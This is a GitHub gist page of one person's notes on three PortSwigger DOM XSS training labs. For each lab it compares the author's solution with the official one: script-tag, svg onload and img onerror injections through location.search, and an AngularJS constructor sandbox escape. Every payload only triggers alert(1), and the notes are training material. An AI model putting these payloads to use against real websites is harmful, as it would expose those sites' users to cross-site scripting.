ruevaughn/dom_xss_portswigger_labs.md

Last active March 24, 2021 00:46

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/ruevaughn/39280a2e4ddb95f86872501bc25f6ab3.js"></script>
Save ruevaughn/39280a2e4ddb95f86872501bc25f6ab3 to your computer and use it in GitHub Desktop.

Raw

XSS

Lab: DOM XSS in document.write sink using source location.search
- My Solution: "><script>alert(1)</script>
- Their Solution: "><svg onload=alert(1)>
Lab: DOM XSS in document.write sink using source location.search inside a select element
- Mine: product?productId=1&storeId="<script>alert(1)</script>
- Theirs: product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
- Mine: {{$on.constructor('alert(1)')()}}
- Theirs: {{$on.constructor('alert(1)')()}}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment